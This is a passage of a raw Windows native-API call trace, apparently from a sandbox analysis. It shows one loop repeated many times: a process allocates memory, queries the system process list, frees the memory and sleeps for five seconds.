BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.977] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.984] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.033] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.085] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.099] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 